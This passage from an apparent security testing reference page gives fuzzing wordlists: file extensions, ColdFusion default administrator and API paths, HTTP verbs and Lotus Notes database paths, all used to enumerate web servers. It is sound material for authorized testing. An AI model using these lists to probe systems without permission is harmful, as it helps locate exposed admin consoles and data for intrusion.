.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
